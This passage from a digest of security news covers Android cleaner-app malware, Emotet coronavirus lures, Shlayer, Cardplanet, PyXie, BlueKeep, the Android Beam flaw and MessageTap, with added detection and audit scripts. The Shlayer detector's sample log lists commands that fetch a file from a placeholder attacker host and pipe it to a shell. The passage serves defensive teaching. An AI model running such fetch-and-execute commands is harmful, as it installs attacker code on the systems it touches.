What’s more important in this case is Trend Micro’s takeaways for avoiding shitty apps like these on the Google Play Store. But first, I’m going to give you my advice: You don’t need cleaner apps for your Android.

Sample size of one here, but I’ve never used (or needed) a cleaner app in all the countless years I’ve used Android, and my devices have never suffered. Besides, you’re only asking for trouble if you actually think that an app with a scammy-sounding title like “Super Clean-Phone Booster,Junk Cleaner&CPU Cooler” is going to do anything helpful for your phone.

If you really, really feel like your device’s performance is terrible, consider backing up your photos and videos to the cloud, factory resetting your device, and setting it up from scratch again. Odds are good your device will still feel slow, since newer apps and operating system updates might have more demanding requirements than when you first purchased your smartphone, but you might at least be able to clear up some system resources by mass-clearing out any background apps you forgot about. And if your phone was nearly maxed out with data, clearing up some space might make Android feel a little faster.

As for Trend Micro, they have a great observation about how it’s difficult to verify an app’s legitimacy by only looking at its reviews and ratings—if you’re just focusing on numbers and stars, that is.

"Verifying an app’s legitimacy is typically done by checking user-created reviews on the Play Store. However, in this particular case, the malicious app is capable of downloading payloads that can post fake reviews unbeknownst to the user. Despite the slew of positive reviews, it does leave some red flags — even though different users left positive reviews, the comments they leave contain the same, exact text: ‘Great, works fast and good.’ They also gave the app the same four-star rating."

As always, stick to downloading apps from Google Play and turn off your device’s ability to install apps from unknown sources, if you’ve ever used that to sideload an app and forgot to reset it. When you’re considering installing a new app on your device, even from Google Play, ask yourself whether it’s truly necessary. Do a web search to see if more trustworthy alternatives exist from well-known app developers and brands. Read the reviews to see if they sound off. Has the app been around for years and received regular updates, or is this an app’s very first version—and, somehow, it’s racked up a ton of reviews despite only being a few days old?

Unfortunately, the onus is on you to keep your device free of crappy apps. Google can help, but it can’t catch everything in advance—as we’ve seen. And make sure you’re giving your friends this advice, too; you might be smart, but your loved ones who are a bit less tech-savvy are probably going crazy with cleaner and other crapware downloads. Help them!

Source
  9. New Coronavirus Strain? Nope, Just Hackers Trying to Spread Malware

The hackers have been using files and emails that warn about a new coronavirus strain to trick users into opening them. Doing so can secretly deliver malware to the victim's machine.

Received a random file about the coronavirus? It's best to avoid opening it. Hackers are starting to exploit fears around the ongoing outbreak to infect computers with malware, according to security researchers. The attacks have been occurring through files and emails that pretend to know something about the coronavirus, but have actually been designed to take over the victim's computer.

On Wednesday, the hackers were spotted sending out spam emails to users in Japan, warning about a new strain of coronavirus reaching the island country, according to IBM Security. The emails, which are written in Japanese, urge the recipient to open up the attached Word document to learn more. If macros are enabled, the opened document will be able to execute a series of commands to secretly download the Emotet malware, which can steal sensitive information from your machine or deliver other dangerous payloads, such as ransomware. The email pretends to come from a disability welfare service provider.

"This new approach to delivering Emotet may be significantly more successful, due to the wide impact of the coronavirus and the fear of infection surrounding it," IBM Security said in the report. "We expect to see more malicious email traffic based on the coronavirus in the future, as the infection spreads. This will probably include other languages too."

On Thursday, the security firm Kaspersky Lab also reported uncovering malicious files disguised as documents about a new strain of coronavirus. To deliver the payload, the hackers were using PDFs, MP4 files and Word documents.

"The file names imply that they contain video instructions on how to protect yourself from the virus, updates on the threat and even virus detection procedures, which is not actually the case," Kaspersky Lab said. In reality, the discovered files contained a range of different malware threats capable of destroying, blocking, modifying and copying data on the victim's machine.

"So far we have seen only 10 unique files, but as this sort of activity often happens with popular media topics, we expect that this tendency may grow," said Kaspersky malware analyst Anton Ivanov in a statement. On Friday, the security firm updated the number of detected malicious files to 32.

Source
  10. Mac users are getting bombarded by laughably unsophisticated malware

For malware so trite and crude, Shlayer is surprisingly prolific.

Almost two years have passed since the appearance of Shlayer, a piece of Mac malware that gets installed by tricking targets into installing fake Adobe Flash updates. It usually does so after promising pirated videos, which are also fake. The lure may be trite and easy to spot, but Shlayer continues to be common—so much so that it’s the number one threat encountered by users of Kaspersky Lab’s antivirus programs for macOS.

Since Shlayer first came to light in February 2018, Kaspersky Lab researchers have collected almost 32,000 different variants and identified 143 separate domains operators have used to control infected machines. The malware accounts for 30 percent of all malicious detections generated by Kaspersky Lab’s Mac AV products. Attacks are most common against US users, who account for 31 percent of attacks Kaspersky Lab sees. Germany, with 14 percent, and France and the UK (both with 10 percent) followed.

For malware using such a crude and outdated infection method, Shlayer remains surprisingly prolific. An analysis Kaspersky Lab published on Thursday says that Shlayer is “a rather ordinary piece of malware” that, except for a recent variant based on a Python script, was built on Bash commands. Under the hood, the workflow for all versions is similar: they collect IDs and system versions and, based on that information, download and execute a file. The download is then deleted to remove traces of an infection. Shlayer also uses curl with the combination of options -f0L, which Thursday’s post said “is basically the calling card of the entire family.”

Another banal detail about Shlayer is its previously mentioned infection method. It’s seeded in links that promise pirated versions of commercial software, episodes of TV shows, or live feeds of sports matches. Once users click, they receive a notice that they should install a Flash update. Never mind that Flash has been effectively deprecated for years and that platforms offering warez and pirated content are a known breeding ground for malware.

Second verse, same as the first

The file downloaded by the Python variant Kaspersky Lab analyzed installs adware known as Cimpli. It ostensibly offers to install applications such as Any Search, which as indicated by search results is clearly a program no one should want. Behind the scenes, it installs a malicious Safari extension and a tool that includes a self-signed TLS certificate that allows the extension to view encrypted HTTPS traffic.

To work around any user suspicions, Cimpli superimposes its own windows over dialog boxes that macOS provides. The left windows in the image below are what targeted users see when Cimpli is installing the Safari extension. The window to the right is what’s covered up. By clicking on the button, the user unwittingly agrees to install the extension. The HTTPS decryption tool also superimposes a fake window over the installation confirmation box. Once installed, all user traffic is redirected to an attacker-controlled proxy server.

Shlayer traditionally has relied on paid affiliates to seed advertising landing pages that display the fake Flash updates. Kaspersky Lab said Shlayer offers some of the highest rates. A newer ploy is the embedding of malicious links in pages on Wikipedia and YouTube. Kaspersky Lab said a single affiliate did so by registering more than 700 expired domains.

It’s hard to believe that malware this artless would be among the most common threats facing Mac users. One explanation may be that Shlayer operators must bombard Mac users over and over in a brute-force fashion to compensate for extremely low success rates. A more somber, and probably less likely, possibility: the success rate is high enough that operators keep coming back for more. In either case, it’s likely that the help of affiliates contributes to Shlayer’s ranking.

In any event, Shlayer’s ranking is a good reason for people to remember that Flash is an antiquated browser add-on that presents more risk than benefit for the vast majority of the world. For those who must use it, they should download updates solely from https://get.adobe.com/flashplayer/. People should never receive updates from windows that are displayed when trying to view videos or install software. The distinction can be hard for less experienced users, because Flash itself presents—or at least used to present—notifications when updates were available. People also would do well to steer clear of sites offering pirated material.

Source: Mac users are getting bombarded by laughably unsophisticated malware (Ars Technica)
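The Ars Technica piece above quotes Kaspersky Lab's observation that Shlayer's downloader runs curl with the option combination -f0L, and that the same collect-then-download-then-delete workflow appears across the family. A defender can turn that into a simple triage signal over process-execution or shell-history logs. The following is an added example written for this digest; it is not code from the article, from Ars Technica or from Kaspersky Lab. The log lines are constructed for illustration, the "[placeholder-c2]" host names stand in for whatever a real record would contain, and the log layout (timestamp, user, command) is an assumption about the collector.

```python
"""Flag shell commands that invoke curl with -f, -0 and -L together, the
option combination the article (quoting Kaspersky Lab) calls the calling card
of the Shlayer family.  Added defender-side example; not code from the
article or from Kaspersky Lab.  Log lines below are constructed."""
import shlex

# Long-form spellings of the same three curl options, so that
# "curl --fail --http1.0 --location" is caught as well as "-f0L".
LONG_FORMS = {"--fail": "f", "--http1.0": "0", "--location": "L"}
SIGNATURE = frozenset("f0L")
SHELL_SEPARATORS = {"|", "||", "&&", ";"}


def curl_short_options(command: str) -> set:
    """Return the single-letter curl options used in a shell command.

    Clustered short options are expanded (-f0L -> {f, 0, L}) and the long
    spellings in LONG_FORMS are mapped to their letters.  A command that is
    not a curl invocation yields an empty set.  A quoted sub-command such as
    sh -c "curl ..." is parsed recursively.
    """
    try:
        argv = shlex.split(command)
    except ValueError:
        return set()  # unbalanced quotes: not parseable, do not guess
    opts = set()
    seen_curl = False
    for tok in argv:
        if not seen_curl:
            if tok == "curl" or tok.endswith("/curl"):
                seen_curl = True  # bare "curl" or a path such as /usr/bin/curl
            elif "curl" in tok and " " in tok:
                return curl_short_options(tok)  # nested command string
            continue
        if tok in SHELL_SEPARATORS:
            break  # end of the curl command in a pipeline or list
        if tok in LONG_FORMS:
            opts.add(LONG_FORMS[tok])
        elif tok.startswith("-") and not tok.startswith("--") and len(tok) > 1:
            opts.update(tok[1:])  # clustered short options, any order
    return opts


def is_shlayer_style_curl(command: str) -> bool:
    """True when -f, -0 and -L all appear on one curl invocation."""
    return SIGNATURE <= curl_short_options(command)


# Constructed sample log: "<timestamp> <user> <command line>" per line.
SAMPLE_LOG = """\
2020-01-23T10:15:02 user1 curl -fsSL https://example.org/update.sh
2020-01-23T10:15:09 user1 /usr/bin/curl -f0L http://[placeholder-c2]/dl -o /tmp/payload
2020-01-23T10:16:30 user2 curl --fail --http1.0 --location http://[placeholder-c2]/x
2020-01-23T10:17:01 user2 sh -c "curl -L0f http://[placeholder-c2]/y | sh"
2020-01-23T10:18:44 user3 curl -L -o file.zip https://example.org/file.zip
"""


def scan_log(log: str) -> list:
    """Return the command portion of every log line matching the signature."""
    hits = []
    for line in log.splitlines():
        parts = line.split(maxsplit=2)  # timestamp, user, command
        if len(parts) < 3:
            continue
        if is_shlayer_style_curl(parts[2]):
            hits.append(parts[2])
    return hits


if __name__ == "__main__":
    for cmd in scan_log(SAMPLE_LOG):
        print("suspicious curl invocation:", cmd)
```

Three of the five constructed lines match: the clustered -f0L form, the long-option form, and the reordered -L0f inside an sh -c string; the common -fsSL install-script idiom and a plain -L download do not. Treat a match as a reason to look at what was downloaded and whether the file was deleted afterwards, as the article describes, rather than as proof of infection on its own, since -0 (HTTP/1.0) is unusual but not impossible in legitimate scripts.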
  11. Now 29-year-old faces years in the clink after long battle to bring him to justice

A 29-year-old Russian scumbag has admitted masterminding the Cardplanet underworld marketplace as well as a second forum for elite fraudsters.

Aleksei Burkov appeared in a US federal district court in Virginia this week to plead guilty [PDF] to access device fraud, and conspiracy to commit computer intrusion, identity theft, wire and access device fraud, and money laundering.

Cardplanet was an internet souk in which crooks bought and sold stolen bank card details. When he was cuffed and charged last November, prosecutors estimated the website accounted for roughly $20m in fraud. Burkov also ran, we're told, an exclusive invite-only cybercrime den in which malware, money laundering, and hacking-for-hire were touted by top-tier miscreants as well as credit cards.

"To obtain membership in Burkov’s cybercrime forum, prospective members needed three existing members to 'vouch' for their good reputation among cybercriminals and to provide a sum of money, normally $5,000, as insurance," Uncle Sam's legal eagles said of the secret den on Thursday. "These measures were designed to keep law enforcement from accessing Burkov’s cybercrime forum and to ensure that members of the forum honored any deals made while conducting business on the forum."

For the Feds, this has been a long time coming. US authorities sought Burkov's extradition back in 2017 after he was collared in Israel in 2015. After exhausting his opportunities to appeal the extradition in the Israeli legal system, Burkov was sent to the US to face trial in November of last year, and has now finally coughed to his crimes.

Burkov faces a maximum of 15 years behind bars when he is sentenced on May 8, though courts typically hand down much lighter sentences when perps skip lengthy trials and go straight to pleading guilty.

Source
  12. PyXie RAT capabilities include keylogging, stealing login credentials and recording videos, warn researchers at BlackBerry Cylance - who also say the trojan can be used to distribute other attacks, including ransomware.

A newly discovered hacking campaign by a 'sophisticated cyber criminal operation' is targeting healthcare and education organisations with custom-built, Python-based trojan malware which gives attackers almost total control of Windows systems with the ability to monitor actions and steal sensitive data.

Malicious functions of the remote access trojan, dubbed PyXie RAT, include keylogging, credential harvesting, recording video, cookie theft, the ability to perform man-in-the-middle attacks and the capability to deploy other forms of malware onto infected systems. All of this is achieved while clearing evidence of suspicious activity in an effort to ensure the malware isn't discovered.

However, traces of the attacks have been found and detailed by cyber security researchers at BlackBerry Cylance, who named the malware PyXie because of the way its compiled code uses a '.pyx' file extension instead of the '.pyc' typically associated with Python.

PyXie RAT has been active since at least 2018 and is highly customised, indicating that a lot of time and resources have gone into building it. "The custom tooling and the fact it has remained under the radar this long definitely shows a level of obfuscation and stealth in line with a sophisticated cyber criminal operation," Josh Lemos, VP of research and intelligence at BlackBerry Cylance told ZDNet.

The malware is typically delivered to victims by a sideloading technique which leverages legitimate applications to help compromise victims. One of these applications uncovered by researchers was a trojanized version of an open source game, which if downloaded, will go about secretly installing the malicious payload, using PowerShell to escalate privileges and gain persistence on the machine.

A third stage of the multi-level download sees PyXie RAT leverage something known in the code as 'Cobalt Mode' which connects to a command and control server as well as downloading the final payload. This stage of the download takes advantage of Cobalt Strike – a legitimate penetration testing tool – to help install the malware. It's a tactic which is often deployed by cyber criminal gangs and something which aids in making attacks more difficult to attribute. This particular downloader also has similarities with another used to download the Shifu banking trojan, however, it could simply be a case of criminals taking open source – or stolen – code and re-purposing it for their own ends.

"An advantage of utilizing a widely used tool such as Cobalt Strike is it makes attribution difficult since it is used by many different threat actors as well as legitimate pentesters. With the Shifu banking trojan similarities, it is unclear if it is the same actors or if someone else reused some of its code," said Lemos.

Once successfully installed on the target system, the attackers can move around the system and implement commands as they please. In addition to being used to steal usernames, passwords and any other information entering the system, researchers note that there are cases of PyXie being used to deliver ransomware to compromised networks.

"This is a full-featured RAT that can be leveraged for a wide range of goals and the actors will have different motives depending on the target environment. The fact it has been used in conjunction with ransomware in a few environments indicates that the actors may be financially motivated, at least in those instances," said Lemos.

The full extent of the PyXie RAT campaign still isn't certain, but researchers have identified attacks against over 30 organisations, predominantly in the healthcare and education industries, with hundreds of machines believed to have been infected. Aside from likely being a well-resourced cyber criminal group, it's currently unknown who exactly is behind PyXie RAT, but the campaign is still thought to be active.

However, despite the sophisticated nature of the malware, researchers state that it can be protected against by standard cyber hygiene and enterprise security best practices including operating system and application patching, endpoint protection technology, auditing, logging and monitoring of endpoint and network activity and auditing of credential use.

Source
  13. After months of warnings, the first successful attack using Microsoft's BlueKeep vulnerability has arrived—but isn't nearly as bad as it could have been. Microsoft first announced the BlueKeep vulnerability in May; now, hackers have finally caught up with it. When Microsoft revealed last May that millions of Windows devices had a serious hackable flaw known as BlueKeep—one that could enable an automated worm to spread malware from computer to computer—it seemed only a matter of time before someone unleashed a global attack. As predicted, a BlueKeep campaign has finally struck. But so far it's fallen short of the worst case scenario. Security researchers have spotted evidence that their so-called honeypots—bait machines designed to help detect and analyze malware outbreaks—are being compromised en masse using the BlueKeep vulnerability. The bug in Microsoft's Remote Desktop Protocol allows a hacker to gain full remote code execution on unpatched machines; while it had previously only been exploited in proofs of concept, it has potentially devastating consequences. Another worm that targeted Windows machines in 2017, the NotPetya ransomware attack, caused more than 10 billion dollars in damage worldwide. But so far, the widespread BlueKeep hacking merely installs a cryptocurrency miner, leeching a victim's processing power to generate cryptocurrency. And rather than a worm that jumps unassisted from one computer to the next, these attackers appear to have scanned the internet for vulnerable machines to exploit. That makes this current wave unlikely to result in an epidemic. "BlueKeep has been out there for a while now. But this is the first instance where I’ve seen it being used on a mass scale," says Marcus Hutchins, a malware researcher for security firm Kryptos Logic who was one of the first to build a working proof-of-concept for the BlueKeep vulnerability. "They’re not seeking targets. They’re scanning the internet and spraying exploits." 
Hutchins says that he first learned of the BlueKeep hacking outbreak from fellow security researcher Kevin Beaumont, who observed his honeypot machines crashing over the last few days. Since those devices exposed only port 3389 to the internet—the port used by RDP—he quickly suspected BlueKeep. Beaumont then shared a "crashdump," forensic data from those crashed machines, with Hutchins, who confirmed that BlueKeep was the cause, and that the hackers had intended to install a cryptocurrency miner on the victim machines. Hutchins says he hasn’t yet determined which coin they’re trying to mine, and notes that the fact that the target machines crash indicates that the exploit may be unreliable. The malware's authors appear to be using a version of the BlueKeep hacking technique included in the open-source hacking and penetration testing framework Metasploit, Hutchins says, which was made public in September. It's also unclear how many devices have been impacted, although the current BlueKeep outbreak appears to be far from the RDP pandemic that many feared. "I've seen a spike, but not the level I'd expect from a worm," says Jake Williams, a founder of the security firm Rendition Infosec, who has been monitoring his clients' networks for signs of exploitation. "It hasn’t hit critical mass yet." In fact, Williams argues, the absence of a more severe wave of BlueKeep hacking so far may actually indicate a success story for Microsoft's response to its BlueKeep bug—an unexpected happy ending. "Every month that passes by without a worm happening, more people patch and the vulnerable population goes down," Williams says. "Since the Metasploit module has been out for a couple of months now, the fact that no one has wormed this yet seems to indicate there’s been a cost-benefit analysis and there’s not a huge benefit to weaponizing it." But the threat BlueKeep poses to hundreds of thousands of Windows machines hasn't passed just yet. 
About 735,000 Windows computers remained vulnerable to BlueKeep according to one internet-wide scan by Rob Graham, a security researcher and founder of Errata Security, who shared those numbers with WIRED in August. And those machines could still be hit with a more serious—and more virulent—specimen of malware that exploits Microsoft's lingering RDP vulnerability. That could take the form of a ransomware worm in the model of NotPetya or WannaCry, which infected almost a quarter million computers when it spread in May of 2017, causing somewhere between $4 billion and $8 billion in damage. In the meantime, the current spate of BlueKeep cryptocurrency mining will represent an annoyance for those unlucky enough to have their computers crashed or hijacked by it—and at most a vague harbinger of a more severe attack on the horizon. "A BlueKeep exploit is perfect for getting more systems to mine from," says Hutchins. "It’s not necessarily going to affect whether someone still makes a ransomware worm at some point." If helping hackers mine a few cryptocoins is the worst that BlueKeep ultimately inflicts, in other words, the internet will have dodged a bullet. Source
  14. All Android 8 (Oreo) or later devices are impacted. Google released a patch last month, in October 2019. Google patched last month an Android bug that can let hackers spread malware to a nearby phone via a little-known Android OS feature called NFC beaming. NFC beaming works via an internal Android OS service known as Android Beam. This service allows an Android device to send data such as images, files, videos, or even apps, to another nearby device using NFC (Near-Field Communication) radio waves, as an alternative to WiFi or Bluetooth. Typically, apps (APK files) sent via NFC beaming are stored on disk and a notification is shown on screen. The notification asks the device owner if he wants to allow the NFC service to install an app from an unknown source. But, in January this year, a security researcher named Y. Shafranovich discovered that apps sent via NFC beaming on Android 8 (Oreo) or later versions would not show this prompt. Instead, the notification would allow the user to install the app with one tap, without any security warning. While the lack of one prompt sounds unimportant, this is a major issue in Android's security model. Android devices aren't allowed to install apps from "unknown sources" -- as anything installed from outside the official Play Store is considered untrusted and unverified. If users want to install an app from outside the Play Store, they have to visit the "Install apps from unknown sources" section of their Android OS and enable the feature. Until Android 8, this "Install from unknown sources" option was a system-wide setting, the same for all apps. But, starting with Android 8, Google redesigned this mechanism into an app-based setting. In modern Android versions, users can visit the "Install unknown apps" section in Android's security settings, and allow specific apps to install other apps. 
For example, in the image below, the Chrome and Dropbox Android apps are allowed to install apps, similar to the Play Store app, without being blocked. The CVE-2019-2114 bug resided in the fact that the Android Beam app was also whitelisted, receiving the same level of trust as the official Play Store app. Google said this wasn't meant to happen, as the Android Beam service was never meant as a way to install applications, but merely as a way to transfer data from device to device. The October 2019 Android patches removed the Android Beam service from the OS whitelist of trusted sources. However, many millions of users remain at risk. If users have the NFC service and the Android Beam service enabled, a nearby attacker could plant malware (malicious apps) on their phones. Since there's no prompt for an install from an unknown source, tapping the notification starts the malicious app's installation. There's a danger that many users might misinterpret the message as coming from the Play Store, and install the app, thinking it's an update. HOW TO PROTECT YOURSELF There is good news and bad news. The bad news is that the NFC feature is enabled by default on almost all newly sold devices. Many Android smartphone owners may not even be aware that NFC is enabled right now. The good news is that NFC connections are initiated only when two devices are put near each other at a distance of 4 cm (1.5 inches) or less. This means an attacker needs to get their phone really close to a victim's, something that may not always be possible. To stay safe, any user can disable both the NFC feature and the Android Beam service. If they use their Android phones as access cards, or as a contactless payment solution, they can leave NFC enabled, but disable the Android Beam service -- see image below. This blocks NFC file beaming, but still allows other NFC operations. So, there's no need to panic. 
Just disable Android Beam and NFC if you don't need them, or update your phone to receive the October 2019 security updates and continue using both NFC and Beam as usual. A technical report on CVE-2019-2114 is available here. Source: Android bug lets hackers plant malware via NFC beaming (via ZDNet)
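The per-app whitelist the article describes can be audited from a workstation with adb. The script below is an added example, not from the article or from Google; it assumes the "install unknown apps" grant is the REQUEST_INSTALL_PACKAGES app-op, that `adb shell appops get <package> REQUEST_INSTALL_PACKAGES` prints a line of the form `REQUEST_INSTALL_PACKAGES: <mode>` (or `No operations.`), and that Android Beam lives in the com.android.nfc package. The dump it parses is constructed.

```python
"""List which apps hold the per-app 'install unknown apps' grant on an
Android 8+ device and flag the NFC package that Android Beam runs in.
Added example, not from the article or from Google.  Assumptions: the
grant is the REQUEST_INSTALL_PACKAGES app-op, `adb shell appops get
<pkg> REQUEST_INSTALL_PACKAGES` prints 'REQUEST_INSTALL_PACKAGES: <mode>'
or 'No operations.', and the sample dump below is constructed."""
import re

NFC_PACKAGE = "com.android.nfc"          # hosts the Android Beam service
OP_NAME = "REQUEST_INSTALL_PACKAGES"
MODE_RE = re.compile(rf"^{OP_NAME}:\s*(\w+)")

# Constructed dump, one line per package: "<package> <appops output>".
# A shell loop such as
#   for p in $(adb shell pm list packages | cut -d: -f2); do
#     echo "$p $(adb shell appops get $p REQUEST_INSTALL_PACKAGES)"; done
# would produce this shape (assumed output format).
SAMPLE_DUMP = """\
com.android.chrome REQUEST_INSTALL_PACKAGES: allow; time=+2d3h10m
com.dropbox.android REQUEST_INSTALL_PACKAGES: allow; time=+5d
com.android.nfc REQUEST_INSTALL_PACKAGES: allow
com.example.game REQUEST_INSTALL_PACKAGES: deny; time=+1h
com.example.notes No operations.
com.example.beta REQUEST_INSTALL_PACKAGES: default
"""


def parse_dump(text):
    """Map package -> app-op mode ('allow', 'deny', 'default', ...).
    Packages with no recorded op get 'default', which means the user is
    prompted and must enable the setting before an install proceeds."""
    modes = {}
    for line in text.splitlines():
        pkg, _, rest = line.partition(" ")
        m = MODE_RE.match(rest.strip())
        modes[pkg] = m.group(1) if m else "default"
    return modes


def audit(modes):
    """Return the packages that may install APKs without the unknown-source
    prompt, and whether the NFC package is among them.  On a device carrying
    the October 2019 patch the Beam service should no longer be granted."""
    allowed = sorted(pkg for pkg, mode in modes.items() if mode == "allow")
    return {"allowed": allowed, "nfc_whitelisted": NFC_PACKAGE in allowed}


if __name__ == "__main__":
    result = audit(parse_dump(SAMPLE_DUMP))
    for pkg in result["allowed"]:
        print("may install apps silently:", pkg)
    if result["nfc_whitelisted"]:
        print("WARNING: Android Beam can install APKs without a prompt "
              "(CVE-2019-2114 pattern); apply the October 2019 patch or disable Beam")
```

The "allowed" list is the one to review on a fleet: every entry is an app that can hand the package installer an APK with a single tap. Chrome and Dropbox being there is the user's choice shown in the article's screenshot; the NFC package being there is the bug.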
  15. Jack Wallen offers up his best advice for avoiding malware on Android. We're back to the topic that bears repeating every month or so: Android and malware. They seem to be like chocolate and peanut butter these days. But why? Is it the developer's fault? Is the onus on Google? I'm going to open a rather messy can of worms and say the blame could easily fall on the shoulders of everyone involved--including the user. But in the end, no matter how secure a platform Google released, if Android is used poorly, bad things will happen. The same holds true for Windows, macOS, and (gasp) even Linux. That's right. I could deploy a Linux desktop to someone and if they misuse the platform, similar bad things could happen. So what's a user to do? Nothing different than I've said before. In fact, I laid out a simple plan for users in 4 ways to avoid malware on Android. But as many an admin knows, the simpler the advice is for end users, the more likely the advice will stick. My advice? Only install applications you have to have. How users use devices I know, it's not really that easy. Why? Because users don't have the control necessary to limit themselves to only installing required applications. According to this article from sister site ZDNet, social media takes up the bulk of smartphone usage, with Americans spending an average of just over an hour a day on Facebook and 48 minutes on Instagram. Millennials spend roughly 48 minutes per day texting, versus 30 minutes for baby boomers. Boomers, on the other hand, spend 43 minutes per day on email, whereas millennials spend less than 10 minutes per day within an email app. 
Outside of that, the majority of time spent on smartphones is divided between the following apps/services:
- Internet
- Podcasts
- Snapchat
- Music
- Twitter
- Youtube
- News apps
- Messenger
- Phone
So our full list of most-used apps and services looks like:
- Facebook
- Instagram
- Texting
- Phone
- Internet
- Podcasts
- Snapchat
- Music
- Twitter
- Youtube
- Messenger
- News apps
- Email
Of those apps/services, Android has the following built into its ecosystem:
- Texting - Messages
- Phone - Phone app
- Internet - Chrome
- Podcasts - Play Music
- Music - Play Music
- Youtube - Youtube app
- Messenger - Messenger app
- News Apps - Google News
- Email - Gmail app
What's left over?
- Instagram
- Snapchat
- Twitter
By installing only three apps, the majority of millennials and boomers can satisfy all of their mobile needs. Three simple apps, each of which are found in the Google Play Store and have been thoroughly vetted by both the companies that created them and Google itself. Or have they? Back in 2014, more than four million Snapchat users' data was released by hackers reacting to Snapchat's claim it had no knowledge of vulnerabilities. This wasn't an issue with the Snapchat app, but the Snapchat service. And it wasn't malware. Installing the Snapchat app on an Android device wasn't accompanied by malicious code. The app itself was safe. As are all of the apps on the list above. At least they are as safe as any piece of software can be. Which is to say, not 100%. But that's the risk we all take for living an always-connected life. As the saying goes, any computer connected to the internet is vulnerable. What's the solution? This is where it gets simple. If you want to avoid malware on Android, you install only the apps you must have to do your work. Outside of that, you install Instagram, Snapchat, and Twitter and use the built-in apps to round out your experience. I know what you're asking. What about games? Funny thing, games. The majority of responses to the original ZDNet screen time poll never mentioned games. 
Of course we all know that the mobile gaming industry is massive, so people are--without a doubt--playing games on their devices. For those that do, I would suggest one of two things:
- Have a separate device for games.
- Only install games from official companies or reputable developers.
In the end, the solution is to limit the apps you install on your device and to only install those apps from the Google Play Store. Do that and the chances of your device getting infected with malware are drastically reduced. Just remember, nothing is guaranteed in this digital age. Be safe. Source: How to avoid malware on Android in one easy step (via Tech Republic)
  16. MessageTap malware is meant to be installed on Short Message Service Center (SMSC) servers, on a telco's network. One of China's state-sponsored hacking groups has developed a custom piece of Linux malware that can steal SMS messages from a mobile operator's network. The malware is meant to be installed on Short Message Service Center (SMSC) servers -- the servers inside a mobile operator's network that handle SMS communications. US cyber-security firm FireEye said it spotted this malware on the network of a mobile operator earlier this year. HOW MESSAGETAP WORKED FireEye analysts said hackers breached a yet-to-be-named telco and planted the malware -- named MessageTap -- on the company's SMSC servers, where it would sniff incoming SMS messages, and apply a set of filters. First, MessageTap would set SMS messages aside to be stolen at a later point if the SMS message's body contained special keywords. "The keyword list contained items of geopolitical interest for Chinese intelligence collection," FireEye said. "Sanitized examples include the names of political leaders, military and intelligence organizations and political movements at odds with the Chinese government." Second, MessageTap would also set SMS messages aside if they were sent from or to particular phone numbers, or from or to a device with a particular IMSI unique identifier. FireEye said the malware tracked thousands of device phone numbers and IMSI codes at a time. PART OF APT41'S ARSENAL The company's analysts linked the malware to a relatively new Chinese hacker group it calls APT41 [PDF report]. In a previous report, FireEye said that APT41 stood apart from other Chinese groups because besides performing politically-motivated cyber-espionage, the group's members also carried out financially-motivated hacks, most likely for their private benefit. 
Furthermore, FireEye also found evidence on the hacked telco's network that APT41 interacted with the mobile operator's call detail record (CDR) database -- a database that stores metadata on past phone calls. FireEye said APT41 queried for the "CDR records [that] corresponded to foreign high-ranking individuals of interest to the Chinese intelligence services." While FireEye didn't name the hacked telco or the spied-on targets, Reuters journalists said that MessageTap was related to China's efforts to track its Uyghur minority, with some of these efforts involving hacking telcos to track Uyghur travelers' movements. CHINESE HACKING OPERATIONS ARE CHANGING The discovery of this campaign is significant in the grand scheme of Chinese cyber-espionage operations as a whole. For years, Chinese hacking groups have been known for their smash-and-grab approach, where they hacked a target and stole as much data as they could, to analyze it at later points. APT41's modus operandi shows a carefully planned and very targeted surveillance operation aimed at a very small group of targets. That's different from what Chinese hacking groups have done in the past, but it appears to have become the norm these days -- if we take into account the CCleaner and ASUS Live Update hacks, where Chinese hackers also breached a company just to go after a small subset of its customers. The overall arc is that Chinese hacker groups are now getting very good at targeted operations, on par with what we've usually seen from US or Russian operations. On a side note, FireEye's report today also confirms a general trend of Chinese hackers going after telecom operators, first detailed in a June 2019 Cybereason report which found that Chinese government hackers had breached the networks of at least ten foreign mobile operators. Source: Chinese hackers developed malware to steal SMS messages from telco's network (via ZDNet)
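MessageTap has to see SMS traffic before it can filter it, which on a Linux SMSC host means owning a raw packet socket. The hunt below is an added example, not from the FireEye report; it reads the kernel's /proc/net/packet table, joins each socket's inode to the process holding it through /proc/<pid>/fd, and reports owners outside an allowlist. The sample table, process names and allowlist are constructed; the column layout is the one the kernel prints.

```python
"""Hunt for processes holding raw packet-capture sockets on a Linux host,
the capability MessageTap needs to sniff SMS traffic on an SMSC.  Added
example, not from the FireEye report.  The /proc/net/packet layout is the
kernel's; the process names, inodes and allowlist are constructed."""
import os
import re

SOCK_TYPES = {2: "SOCK_DGRAM", 3: "SOCK_RAW"}
PROTO_NAMES = {0x0003: "ETH_P_ALL", 0x0800: "ETH_P_IP"}
SOCKET_LINK = re.compile(r"socket:\[(\d+)\]")
# Programs expected to own PF_PACKET sockets on a typical server (constructed).
ALLOWLIST = frozenset({"dhclient", "dhcpcd", "tcpdump", "NetworkManager",
                       "systemd-networkd"})

# Constructed /proc/net/packet: columns are sk RefCnt Type Proto Iface R
# Rmem User Inode.  Iface 0 means "all interfaces".
SAMPLE_PACKET = """\
sk               RefCnt Type Proto  Iface R Rmem   User   Inode
ffff9a4a3c2e1800 3      3    0003   0     1 0      0      29118
ffff9a4a3c2e2400 3      2    0800   2     1 0      0      30572
"""
# Constructed readlink() results for /proc/<pid>/fd/* and /proc/<pid>/comm.
SAMPLE_FDS = {
    412: ["/dev/null", "socket:[30572]"],
    9137: ["/usr/lib/locale/locale-archive", "socket:[29118]", "socket:[31004]"],
}
SAMPLE_COMM = {412: "dhclient", 9137: "smsrouter"}


def parse_proc_net_packet(text):
    """One dict per PF_PACKET socket; the header row is skipped."""
    socks = []
    for line in text.splitlines()[1:]:
        f = line.split()
        if len(f) < 9:
            continue
        socks.append({"type": int(f[2]), "proto": int(f[3], 16),
                      "ifindex": int(f[4]), "uid": int(f[7]), "inode": int(f[8])})
    return socks


def attribute(socks, fd_links, comm):
    """Join sockets to owning processes via the socket:[inode] fd links."""
    by_inode = {s["inode"]: s for s in socks}
    owners = []
    for pid, links in fd_links.items():
        for target in links:
            m = SOCKET_LINK.fullmatch(target)
            if m and int(m.group(1)) in by_inode:
                owners.append({"pid": pid, "comm": comm.get(pid, "?"),
                               **by_inode[int(m.group(1))]})
    return owners


def suspicious(owners, allow=ALLOWLIST):
    """Anything outside the allowlist that can see raw frames deserves a look;
    an ETH_P_ALL socket bound to every interface is the sniffer pattern."""
    return [o for o in owners if o["comm"] not in allow]


def collect_live():
    """Gather the same three inputs from the running host (root needed to
    read other users' fd tables)."""
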